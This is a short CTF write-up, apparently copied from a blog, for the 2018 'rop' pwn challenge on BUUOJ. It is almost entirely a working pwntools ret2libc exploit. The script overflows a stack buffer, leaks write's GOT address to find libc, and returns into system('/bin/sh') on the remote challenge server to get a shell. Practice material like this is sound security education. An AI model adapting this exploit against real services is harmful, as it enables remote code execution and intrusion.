铁人三项(第五赛区)_2018_rop
经典ret2libc3
exp
# Two-stage ret2libc (stage 1 leaks a libc address, stage 2 reuses it).
# Third-party deps: pwntools and LibcSearcher; everything below is network
# I/O against the challenge endpoint, so it is not runnable in isolation.
from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
#p = process('./pwn')
p = remote('node4.buuoj.cn',28146)
elf = ELF('./pwn')
# Addresses are taken straight from the ELF without a load base, which
# presumably only works for a non-PIE binary — confirm against the file.
main_addr = elf.sym['main']
plt_addr = elf.plt['write']
got_addr = elf.got['write']
# Stage 1: padding, then write@plt as the return target, main as write's own
# return address, and write's three args (fd=1, buf=write@got, len=0xD).
# The 0x88+4 padding is presumably the buffer-to-saved-return distance
# found in a disassembler; it is not derivable from this script.
pay1 = b'a'*(0x88+4)+p32(plt_addr)+p32(main_addr)+p32(1)+p32(got_addr)+p32(0xD)
p.sendline(pay1)
# Only the first 4 bytes of the reply are the resolved write address; recv()
# returns whatever is buffered, so a short read would give a wrong u32 here.
write_addr = u32(p.recv()[0:4])#0xf7db1190
print("write_addr = ",hex(write_addr))
# LibcSearcher identifies the remote libc from the leaked symbol and may
# prompt when several candidate builds match.
libc=LibcSearcher('write',write_addr)
# `offset` is the libc load base (leaked runtime address minus the symbol's
# offset inside that libc); it is printed below as libc_base_addr.
offset=write_addr-libc.dump('write')
binsh=offset+libc.dump('str_bin_sh')
system=offset+libc.dump('system')
print("libc_base_addr = ",hex(offset))
print("sys_addr = ",hex(system))
print("sh_addr = ",hex(binsh))
# Stage 2: same padding, return into system with a dummy return address
# ('aaaa') and the "/bin/sh" pointer as its single argument.
pay2 = b'a'*(0x88+4)+p32(system)+b'aaaa'+p32(binsh)
p.sendline(pay2)
p.interactive()
From: https://www.cnblogs.com/imarch22/p/17613884.html